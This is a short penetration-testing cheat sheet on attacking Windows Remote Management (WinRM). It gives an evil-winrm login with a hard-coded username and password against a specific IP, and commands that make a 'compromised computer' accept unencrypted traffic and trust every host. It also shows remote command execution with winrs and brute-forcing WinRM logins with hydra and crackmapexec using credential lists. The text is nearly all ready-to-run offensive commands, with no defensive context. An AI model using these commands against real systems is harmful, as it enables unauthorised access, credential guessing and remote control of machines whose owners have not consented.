WinRM (5985, 5986)
Connect using the WinRM protocol
evil-winrm -i 10.10.11.69 -u p.agila -p BAF-XVRpOno
WinRM client (used in compromised computer) - ensure WSMAN port 5985 is open on target
PS> winrm quickconfig # start winrm service
PS> winrm set winrm/config/Client @{AllowUnencrypted = "true"} # allow HTTP
PS> Set-Item WSMan:localhost\client\trustedhosts -value * # trust all hosts
cmd> winrs -u:[username] -p:[password] -r:http://[target]:5985/wsman "cmd" # execute command
Bruteforcing
Combination pair
hydra -C SecLists/Passwords/Default-Credentials/smb-betterdefaultpasslist.txt 192.168.207.183 winrm
Crackmapexec is also a solid option for winrm
crackmapexec winrm 192.168.207.183 -u users.txt -p passwords.txt